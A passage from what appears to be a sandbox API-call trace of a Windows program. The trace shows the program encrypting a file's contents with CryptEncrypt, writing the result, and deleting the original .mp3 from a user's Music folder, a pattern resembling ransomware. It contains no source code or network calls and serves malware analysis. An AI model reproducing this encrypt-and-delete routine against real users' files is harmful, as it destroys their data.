(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0114.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0114.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0114.764] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0114.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0114.764] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca868, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0114.765] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xbdad, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xbdb0) returned 1 [0114.765] CharLowerBuffW (in: lpsz="byte[48561]", cchLength=0xb | out: lpsz="byte[48561]") returned 0xb [0114.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0114.765] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4539938*, pdwDataLen=0x144e538*=0xbdad, dwBufLen=0xbdb0 | out: pbData=0x4539938*, pdwDataLen=0x144e538*=0xbdb0) returned 1 [0114.766] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0114.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.766] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xbdb0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xbdb0, lpOverlapped=0x0) returned 1 [0114.768] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0114.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca490, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0114.769] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0114.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.769] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0114.770] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0114.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.770] FreeLibrary (hLibModule=0x756e0000) returned 1 [0114.770] CloseHandle (hObject=0x258) returned 1 [0114.770] CloseHandle (hObject=0x298) returned 1 [0114.773] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3", lpFilePart=0x0) returned 0x2e [0114.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0114.773] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\mxxesxxst_.mp3")) returned 0x20 [0114.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0114.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0114.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90484ba0, ftCreationTime.dwHighDateTime=0x1d5e43e, ftLastAccessTime.dwLowDateTime=0x6dab5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e580, ftLastWriteTime.dwLowDateTime=0x6dab5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e580, nFileSizeHigh=0x0, nFileSizeLow=0xbdad, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mxXesXXst_.mp3", cAlternateFileName="MXXESX~1.MP3")) returned 0x41ac280 [0114.774] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\mxxesxxst_.mp3")) returned 1 [0114.845] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90484ba0, ftCreationTime.dwHighDateTime=0x1d5e43e, ftLastAccessTime.dwLowDateTime=0x6dab5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e580, ftLastWriteTime.dwLowDateTime=0x6dab5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e580, nFileSizeHigh=0x0, nFileSizeLow=0xbdad, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mxXesXXst_.mp3", cAlternateFileName="MXXESX~1.MP3")) returned 0 [0114.845] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0114.846] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0114.846] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.846] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0114.846] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0114.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0114.846] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0114.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0114.847] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0114.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0114.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0114.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0114.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0114.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0114.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0114.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0114.849] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0114.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0114.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0114.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0114.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.851] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.851] 